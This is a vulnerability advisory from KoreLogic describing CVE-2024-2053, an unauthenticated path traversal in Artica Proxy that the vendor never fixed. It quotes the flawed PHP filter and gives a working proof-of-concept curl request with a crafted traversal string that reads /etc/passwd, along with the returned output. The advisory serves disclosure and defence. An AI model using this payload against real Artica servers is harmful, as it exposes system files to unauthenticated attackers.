Security Advisory

Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability

CWE-23 Relative Path Traversal

Advisory ID

KL-001-2024-001

CVE ID

CVE-2024-2053

Published

2024-03-05

Vendor

Artica

Affected Systems

Product

Artica Proxy

Version

4.40 and 4.50

Platform

Debian 10 LTS

Discovered By

Jaggar Henry (KoreLogic)

Download (signed .txt)

Back to Advisories

Vulnerability Details

Affected Vendor: Artica

Affected Product: Artica Proxy

Affected Version: 4.40 and 4.50

Platform: Debian 10 LTS

CWE Classification: CWE-23: Relative Path Traversal

CVE ID: CVE-2024-2053

Vulnerability Description

The Artica Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the “www-data” user.

Technical Description

Prior to authentication, a user can send an HTTP request to the images.listener.php endpoint. This endpoint processes the mailattach query parameter and concatenates the user supplied value to the /opt/artica/share/www/attachments/ file path. The contents of the file located at the newly created path is returned in the HTTP response body.

The images.listener.php endpoint attempts to prevent a local file inclusion vulnerability by stripping strings that attempt to traverse into the parent directory from the user supplied mailattach value:

$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);
$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";
header("Content-type: application/force-download" );
header("Content-Disposition: attachment; \
        filename=\"{$_GET["mailattach"]}\"");
header("Content-Length: ".filesize($file)."" );
header("Expires: 0" );
readfile($file);

If effective, this approach would limit files accessible by this endpoint to those within the “/opt/artica/share/www/attachments/” directory. Unfortunately, the removal of the ../ string is only performed once, so the resulting file path is not checked. By using the path ..././foo.txt, the images.listener.php endpoint removes the ../ string resulting in ../foo.txt - a relative file path to traverse to the parent directory.

The strings “/etc/” and “passwd” are also stripped from the file path as many methods of detecting a path traversal vulnerability rely on fetching the “/etc/passwd” file. By inserting these strings into specific locations, a user suppplied “mailattach” value such as “/epasswdtc/ppasswdasswd” is transformed into “/etc/passwd”, bypassing the protection entirely.

An unauthenticated user can leverage this endpoint to read files on the system, according to the privileges of the “www-data” user.

Mitigation and Remediation Recommendation

No response from vendor; no remediation available.

Credit

This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

Proof of Concept

$ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false
quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin
apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh
privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin
ntp:x:109:117::/nonexistent:/usr/sbin/nologin
redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin
prads:x:111:120::/home/prads:/usr/sbin/nologin
freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin
vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin
stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin
sshd:x:115:65534::/run/sshd:/usr/sbin/nologin
vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin
memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false
davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin
ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin
proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin
mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin
openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin
msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin
Debian-snmp:x:126:132::/var/lib/snmp:/bin/false
opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin
avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
glances:x:129:135::/var/lib/glances:/usr/sbin/nologin
ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash
Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin
smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin
debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh
netdata:x:1001:1002:netdata:/home/netdata:/bin/bash
postfix:x:1002:1001::/home/postfix:/bin/sh
...
...

The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Disclosure Timeline

2023-12-18

KoreLogic requests vulnerability contact and secure communication method from Artica.

2023-12-18

Artica Support issues automated ticket #1703011342 promising follow-up from a human.

2024-01-10

KoreLogic again requests vulnerability contact and secure communication method from Artica.

2024-01-10

KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!"

2024-01-11

KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form.

2024-01-23

KoreLogic requests CVE from MITRE.

2024-01-23

MITRE issues automated ticket #1591692 promising follow-up from a human.

2024-02-01

30 business days have elapsed since KoreLogic attempted to contact the vendor.

2024-02-06

KoreLogic requests update on CVE from MITRE.

2024-02-15

KoreLogic requests update on CVE from MITRE.

2024-02-22

KoreLogic reaches out to alternate CNA for CVE identifiers.

2024-02-26

45 business days have elapsed since KoreLogic attempted to contact the vendor.

2024-02-29

Vulnerability details presented to AHA! (takeonme.org) by proxy.

2024-03-01

AHA! issues CVE-2024-2053 to track this vulnerability.

2024-03-05

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination

90+ day disclosure timeline

CVE coordination when applicable

Resources & Downloads

Contact Security Team

All Advisories Download signed .txt